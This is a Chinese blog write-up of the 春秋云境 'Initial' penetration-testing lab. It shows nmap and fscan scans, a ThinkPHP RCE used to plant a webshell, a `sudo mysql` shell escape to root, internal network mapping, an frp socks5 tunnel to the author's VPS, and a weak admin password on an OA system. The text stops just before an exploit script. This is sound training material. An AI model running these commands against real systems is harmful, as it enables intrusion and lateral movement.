<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="写在最前面圈圈表示你太菜了，并反手向你丢了7个沙砾(qwq) 钱队一直说渗透很重要，这次就用这个最简单的靶场来进行正式的入门(希望不会在明年7月留下遗憾) 开始！flag1题目给出了一个ip地址39.101.193.135，我们可以使用nmap来看看他开启了那些端口，命令为 1sudo nmap --min-rate 10000 39.101.193.135  这段命令是以最小速率 10000 对">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋云境-Initial">
<meta property="og:url" content="https://chimedal.github.io/2024/09/22/Initial/index.html">
<meta property="og:site_name" content="Chimedal">
<meta property="og:description" content="写在最前面圈圈表示你太菜了，并反手向你丢了7个沙砾(qwq) 钱队一直说渗透很重要，这次就用这个最简单的靶场来进行正式的入门(希望不会在明年7月留下遗憾) 开始！flag1题目给出了一个ip地址39.101.193.135，我们可以使用nmap来看看他开启了那些端口，命令为 1sudo nmap --min-rate 10000 39.101.193.135  这段命令是以最小速率 10000 对">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-ba63118630c5c443fd93d3aeb572a921_1440w.png">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-453c44f80de04d6cba51b6bfc76e0d86_1440w.png">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-2b86edd2de4b8b1ae960e065a339a300_1440w.png">
<meta property="og:image" content="https://pica.zhimg.com/80/v2-d65497a7e19ca02e88b09378f4ff194b_1440w.png">
<meta property="article:published_time" content="2024-09-22T04:09:00.000Z">
<meta property="article:modified_time" content="2024-09-22T04:15:00.000Z">
<meta property="article:author" content="Chimedal">
<meta property="article:tag" content="Penetration">
<meta property="article:tag" content="春秋云境">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://picx.zhimg.com/80/v2-ba63118630c5c443fd93d3aeb572a921_1440w.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.png">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.png">
        
      
    
    <!-- title -->
    <title>春秋云境-Initial</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/link/">Link</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/09/22/Linux%E6%8F%90%E6%9D%83/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://chimedal.github.io/2024/09/22/Initial/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://chimedal.github.io/2024/09/22/Initial/&text=春秋云境-Initial"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://chimedal.github.io/2024/09/22/Initial/&is_video=false&description=春秋云境-Initial"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=春秋云境-Initial&body=Check out this article: https://chimedal.github.io/2024/09/22/Initial/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://chimedal.github.io/2024/09/22/Initial/&name=春秋云境-Initial&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://chimedal.github.io/2024/09/22/Initial/&t=春秋云境-Initial"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%99%E5%9C%A8%E6%9C%80%E5%89%8D%E9%9D%A2"><span class="toc-number">1.</span> <span class="toc-text">写在最前面</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B%EF%BC%81"><span class="toc-number">2.</span> <span class="toc-text">开始！</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag1"><span class="toc-number">2.1.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag2"><span class="toc-number">2.2.</span> <span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag3"><span class="toc-number">2.3.</span> <span class="toc-text">flag3</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">3.</span> <span class="toc-text">总结</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        春秋云境-Initial
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Chimedal</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-22T04:09:00.000Z" class="dt-published" itemprop="datePublished">2024-09-22</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Penetration/" rel="tag">Penetration</a>, <a class="p-category" href="/tags/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/" rel="tag">春秋云境</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="写在最前面"><a href="#写在最前面" class="headerlink" title="写在最前面"></a>写在最前面</h1><p>圈圈表示你太菜了，并反手向你丢了7个沙砾(qwq)</p>
<p>钱队一直说渗透很重要，这次就用这个最简单的靶场来进行正式的入门(希望不会在明年7月留下遗憾)</p>
<h1 id="开始！"><a href="#开始！" class="headerlink" title="开始！"></a>开始！</h1><h2 id="flag1"><a href="#flag1" class="headerlink" title="flag1"></a>flag1</h2><p>题目给出了一个ip地址39.101.193.135，我们可以使用nmap来看看他开启了那些端口，命令为</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> nmap --min-rate 10000 39.101.193.135</span><br></pre></td></tr></table></figure></div>

<p>这段命令是以最小速率 10000 对全部端口（1-65535）进行扫描，10000 是权衡的结果，数字过大扫描速度快，但容易遗漏端口，数字过小则扫描时间过长，经验表明 10000 就是扫描的合适速度。-p 是端口参数，-p- 表示对所有端口进行扫描。扫描结果如下：</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop]</span><br><span class="line">└─# <span class="built_in">sudo</span> nmap --min-rate 10000 39.101.193.135        </span><br><span class="line">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 21:49 EDT</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 39.101.193.135</span><br><span class="line">Host is up (0.015s latency).</span><br><span class="line">Not shown: 998 filtered tcp ports (no-response)</span><br><span class="line">PORT   STATE SERVICE</span><br><span class="line">22/tcp open  ssh</span><br><span class="line">80/tcp open  http</span><br><span class="line"></span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 0.96 seconds</span><br></pre></td></tr></table></figure></div>

<p>可以看到开启了 22、80 端口，22 端口是一个 ssh 服务，80 端口是一个 http 服务，接下来我们可以查看这个几个端口开启的服务和操作系统版本，命令如下：</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap –sT –sV -O –p22,80 39.101.193.135</span><br></pre></td></tr></table></figure></div>

<p>其中<code>-sT</code>表示进行<code>TCP</code>扫描（三次握手）,<code>-p</code>表示待扫描的端口（后跟待扫描的端口 22、80）<code>-sV</code>表示探测开放服务的版本,<code>-O</code>表示探测操作系统版本，扫描结果如下：<br><img src="https://picx.zhimg.com/80/v2-ba63118630c5c443fd93d3aeb572a921_1440w.png"></p>
<p>可以看到这个ip是一台 ubuntu linux 服务器，好像也没有什么有用的信息，想到还有一个非常好用的扫描工具<code>fscan</code></p>
<p>安装看<a target="_blank" rel="noopener" href="https://github.com/shadow1ng/fscan/releases">fscan安装教程</a>,在这个页面直接下载，不用按网上的教程配go环境编译，不然会被圈圈骂(bushi</p>
<p>这个工具有linux和windows版本，其具体用法可以看官方的文档，这里只用于进行简单的端口扫描，(cmd)输入：</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.\fscan -h 39.101.193.135</span><br></pre></td></tr></table></figure></div>

<p>结果如下：</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">D:\PenetrationW&gt;.\fscan -h 39.101.193.135</span><br><span class="line"></span><br><span class="line">   ___                              _</span><br><span class="line">  / _ \     ___  ___ _ __ __ _  ___| | __</span><br><span class="line"> / /_\/____/ __|/ __| <span class="string">&#x27;__/ _` |/ __| |/ /</span></span><br><span class="line"><span class="string">/ /_\\_____\__ \ (__| | | (_| | (__|   &lt;</span></span><br><span class="line"><span class="string">\____/     |___/\___|_|  \__,_|\___|_|\_\</span></span><br><span class="line"><span class="string">                     fscan version: 1.8.4</span></span><br><span class="line"><span class="string">start infoscan</span></span><br><span class="line"><span class="string">39.101.193.135:22 open</span></span><br><span class="line"><span class="string">39.101.193.135:80 open</span></span><br><span class="line"><span class="string">[*] alive ports len is: 2</span></span><br><span class="line"><span class="string">start vulscan</span></span><br><span class="line"><span class="string">[*] WebTitle http://39.101.193.135     code:200 len:5578   title:Bootstrap Material Admin</span></span><br><span class="line"><span class="string">[+] PocScan http://39.101.193.135 poc-yaml-thinkphp5023-method-rce poc1</span></span><br><span class="line"><span class="string">已完成 2/2</span></span><br><span class="line"><span class="string">[*] 扫描结束,耗时: 47.871504s</span></span><br></pre></td></tr></table></figure></div>

<p>可以看到 web server 的版本是<code>ThinkPHP 5.0.23</code>，而且存在漏洞！！！<br>当然也可以使用nmap命令来进行漏洞扫描，命令如下：</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap --script=vuln -p22,80 39.99.255.153</span><br></pre></td></tr></table></figure></div>

<p>这里使用ThinkphpGUI这个开源工具来进行扫一下，<br>工具链接为：<a target="_blank" rel="noopener" href="https://github.com/Lotus6/ThinkphpGUI">Lotus6&#x2F;ThinkphpGUI: Thinkphp(GUI)漏洞利用工具，支持各版本TP漏洞检测，命令执行，getshell。 (github.com)</a></p>
<p>输入<code>url</code>和选择版本后点击检测和<code>GetShell</code>即可</p>
<p><img src="https://pica.zhimg.com/80/v2-453c44f80de04d6cba51b6bfc76e0d86_1440w.png"></p>
<p>可以看到网页存在一个后门，工具还给了一个漏洞利用的<code>poc</code>，我们利用他给的<code>poc</code>来写入<code>shell.php</code>后门，但是没什么回显</p>
<p>那就用蚁剑连接一下剩下的那个后门，成功连接</p>
<p>接下来就是需要提取，我们先看一下自己是什么权限(蚁剑的虚拟终端)：</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">(www-data:/var/www/html) $ <span class="built_in">whoami</span></span><br><span class="line">www-data</span><br><span class="line">(www-data:/var/www/html) $ <span class="built_in">uname</span> -a</span><br><span class="line">Linux ubuntu-web01 5.4.0-110-generic <span class="comment">#124-Ubuntu SMP Thu Apr 14 19:46:19 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux</span></span><br><span class="line">(www-data:/var/www/html) $ <span class="built_in">id</span></span><br><span class="line">uid=33(www-data) gid=33(www-data) <span class="built_in">groups</span>=33(www-data)</span><br><span class="line">(www-data:/var/www/html) $ <span class="built_in">sudo</span> -l</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> www-data on ubuntu-web01:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line">User www-data may run the following commands on ubuntu-web01:</span><br><span class="line">    (root) NOPASSWD: /usr/bin/mysql</span><br></pre></td></tr></table></figure></div>

<p>可以看见是<code>www-data</code>权限(无法进入root文件夹)，但是输入<code>sudo -l</code>时回显</p>
<blockquote>
<p>(root) NOPASSWD: &#x2F;usr&#x2F;bin&#x2F;mysql</p>
</blockquote>
<p>这说明我们可以通过通过<code>sudo</code>高权限运行<code>mysql</code>，进而能够执行 root权限才能执行的命令，可以参考下面这篇文章，里面也有讲很多种提取的方法<a target="_blank" rel="noopener" href="https://blog.csdn.net/Bossfrank/article/details/132035121">渗透测试：Linux提权精讲（三）之sudo方法第三期_nmap sudo 提权-CSDN博客</a></p>
<p>于是我们就能很容易的获取到<code>flag1</code>，可以发现<code>flag1</code>在<code>/root/flag</code>目录下</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">(www-data:/var/www/html) $ <span class="built_in">sudo</span> mysql -e <span class="string">&#x27;\! /bin/sh&#x27;</span></span><br><span class="line">(www-data:/var/www/html) $ <span class="built_in">sudo</span> mysql -e <span class="string">&#x27;\! ls /root&#x27;</span></span><br><span class="line">flag</span><br><span class="line">(www-data:/var/www/html) $ <span class="built_in">sudo</span> mysql -e <span class="string">&#x27;\! ls /root/flag&#x27;</span></span><br><span class="line">flag01.txt</span><br><span class="line">(www-data:/var/www/html) $ <span class="built_in">sudo</span> mysql -e <span class="string">&#x27;\! cat /root/flag/flag01.txt&#x27;</span></span><br><span class="line"> ██     ██ ██     ██       ███████   ███████       ██     ████     ██   ████████ </span><br><span class="line">░░██   ██ ░██    ████     ██░░░░░██ ░██░░░░██     ████   ░██░██   ░██  ██░░░░░░██</span><br><span class="line"> ░░██ ██  ░██   ██░░██   ██     ░░██░██   ░██    ██░░██  ░██░░██  ░██ ██      ░░ </span><br><span class="line">  ░░███   ░██  ██  ░░██ ░██      ░██░███████    ██  ░░██ ░██ ░░██ ░██░██         </span><br><span class="line">   ██░██  ░██ ██████████░██      ░██░██░░░██   ██████████░██  ░░██░██░██    █████</span><br><span class="line">  ██ ░░██ ░██░██░░░░░░██░░██     ██ ░██  ░░██ ░██░░░░░░██░██   ░░████░░██  ░░░░██</span><br><span class="line"> ██   ░░██░██░██     ░██ ░░███████  ░██   ░░██░██     ░██░██    ░░███ ░░████████ </span><br><span class="line">░░     ░░ ░░ ░░      ░░   ░░░░░░░   ░░     ░░ ░░      ░░ ░░      ░░░   ░░░░░░░░  </span><br><span class="line">Congratulations!!! You found the first flag, the next flag may be <span class="keyword">in</span> a server <span class="keyword">in</span> the internal network.</span><br><span class="line">flag01: flag&#123;60b53231-</span><br></pre></td></tr></table></figure></div>

<h2 id="flag2"><a href="#flag2" class="headerlink" title="flag2"></a>flag2</h2><p>接下来就是要考虑内网横向移动，我们的最终目的是获取域控上的 flag，我们先用蚁剑上传 fscan，扫描一下内网中有那些存活机器</p>
<p>这里要记得给<code>fscan</code>执行权限<code>chmod 777 fscan</code>，否则会执行不了<br>通过<code>ip a</code>我们可以发现网段为<code>172.22.1.0/24</code></p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./fscan -h 172.22.1.0/24</span><br></pre></td></tr></table></figure></div>

<p>扫描的结果会自动存在当前目录的<code>result.txt</code>文件上</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line">(www-data:/var/www/html) $ <span class="built_in">chmod</span> 777 fscan</span><br><span class="line">(www-data:/var/www/html) $ ip a</span><br><span class="line">1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000</span><br><span class="line">    <span class="built_in">link</span>/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00</span><br><span class="line">    inet 127.0.0.1/8 scope host lo</span><br><span class="line">       valid_lft forever preferred_lft forever</span><br><span class="line">    inet6 ::1/128 scope host </span><br><span class="line">       valid_lft forever preferred_lft forever</span><br><span class="line">2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc mq state UP group default qlen 1000</span><br><span class="line">    <span class="built_in">link</span>/ether 00:16:3e:1e:d4:00 brd ff:ff:ff:ff:ff:ff</span><br><span class="line">    inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0</span><br><span class="line">       valid_lft 315358560sec preferred_lft 315358560sec</span><br><span class="line">    inet6 fe80::216:3eff:fe1e:d400/64 scope <span class="built_in">link</span> </span><br><span class="line">       valid_lft forever preferred_lft forever</span><br><span class="line">(www-data:/var/www/html) $ ./fscan -h 172.22.1.0/24</span><br><span class="line">(www-data:/var/www/html) $ <span class="built_in">ls</span></span><br><span class="line">favicon.ico</span><br><span class="line">fscan</span><br><span class="line">index.php</span><br><span class="line">peiqi.php</span><br><span class="line">result.txt</span><br><span class="line">robots.txt</span><br><span class="line">router.php</span><br><span class="line">static</span><br><span class="line">(www-data:/var/www/html) $ <span class="built_in">cat</span> result.txt</span><br><span class="line">172.22.1.2:88 open</span><br><span class="line">172.22.1.18:80 open</span><br><span class="line">172.22.1.15:80 open</span><br><span class="line">172.22.1.15:22 open</span><br><span class="line">172.22.1.18:3306 open</span><br><span class="line">172.22.1.21:445 open</span><br><span class="line">172.22.1.18:445 open</span><br><span class="line">172.22.1.2:445 open</span><br><span class="line">172.22.1.21:139 open</span><br><span class="line">172.22.1.18:139 open</span><br><span class="line">172.22.1.2:139 open</span><br><span class="line">172.22.1.21:135 open</span><br><span class="line">172.22.1.18:135 open</span><br><span class="line">172.22.1.2:135 open</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]172.22.1.2</span><br><span class="line">   [-&gt;]DC01</span><br><span class="line">   [-&gt;]172.22.1.2</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]172.22.1.21</span><br><span class="line">   [-&gt;]XIAORANG-WIN7</span><br><span class="line">   [-&gt;]172.22.1.21</span><br><span class="line">[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin</span><br><span class="line">[*] OsInfo 172.22.1.2    (Windows Server 2016 Datacenter 14393)</span><br><span class="line">[*] NetInfo </span><br><span class="line">[*]172.22.1.18</span><br><span class="line">   [-&gt;]XIAORANG-OA01</span><br><span class="line">   [-&gt;]172.22.1.18</span><br><span class="line">[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393</span><br><span class="line">[+] MS17-010 172.22.1.21    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)</span><br><span class="line">[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1</span><br><span class="line">[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600</span><br><span class="line">[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login</span><br><span class="line">[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统</span><br><span class="line">[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1</span><br></pre></td></tr></table></figure></div>

<p>于是我们搜集到如下信息：</p>
<blockquote>
<p>172.22.1.2:DC域控<br>172.22.1.21:Windows的机器并且存在MS17-010 漏洞<br>172.22.1.18:信呼OA办公系统</p>
</blockquote>
<p>而我们的最终目标即为<code>DC</code>域控<br>我们首先是对<code>OA</code>办公系统进行攻击，在这之前我们要先进行内网穿透，其目的是使我们能够在攻击机访问内网的服务，这里我们需要一台<code>vps</code>和工具<code>frp</code>，学过web的师傅都知道 vps 是什么，这里就不做解释，<code>frp</code>的相关知识也请读者自行学习，这里只做简单的介绍。frp的下载地址为，有linux和windows版本：<br><a target="_blank" rel="noopener" href="https://github.com/fatedier/frp">fatedier&#x2F;frp: A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet. (github.com)</a></p>
<p>其中<code>frpc</code>和<code>frps</code>是可执行文件，我们需要将<code>frps</code>和<code>frps.ini</code>上传到我们的vps<code>frpc</code>和<code>frpc.ini</code>上传到我们的靶机</p>
<p>下面是我相关文件的配置<br>frpc.ini：</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[common] </span><br><span class="line">server_addr = 123.249.99.71 # 我vps的ip地址</span><br><span class="line">server_port = 7000  </span><br><span class="line"></span><br><span class="line">[socks5] </span><br><span class="line">type = tcp   </span><br><span class="line">plugin = socks5  </span><br><span class="line">remote_port = 798</span><br></pre></td></tr></table></figure></div>

<p>frps.ini:</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">bind_port = 7000</span><br></pre></td></tr></table></figure></div>

<p>这里要确保你的 vps 开启了 7000 和 798 端口</p>
<p>在<code>vps</code>执行</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./frps -c frps.ini</span><br></pre></td></tr></table></figure></div>

<p>然后在靶机执行：</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./frpc -c frpc.ini</span><br></pre></td></tr></table></figure></div>
<p>(顺序不能反)</p>
<p>最后在攻击机你自己的电脑上（windows，不是 kali，kali 的配置方法在后面有讲）使用Proxy Servers配置 socks5 代理即可(不能提前开)</p>
<p><img src="https://picx.zhimg.com/80/v2-2b86edd2de4b8b1ae960e065a339a300_1440w.png"></p>
<p>配置完后就能直接在浏览器中输入<code>172.22.1.18</code>进行访问了，可以看到该系统的版本是<code>2.2.8</code>（这个是重点，可以通过搜索系统的版本号看看有没有已经给发现的漏洞）</p>
<p><img src="https://pica.zhimg.com/80/v2-d65497a7e19ca02e88b09378f4ff194b_1440w.png"></p>
<p>这里存在一个弱口令，admin&#x2F;admin123</p>
<p>这个系统存在文件上传漏洞，有直接的poc,直接参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/solitudi/article/details/118675321">[代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE_信呼协同办公系统弱口令-CSDN博客</a></p>
<p>exp用上面那个会报错，在网上又找了一个，下面的可以<br>exp.py：</p>
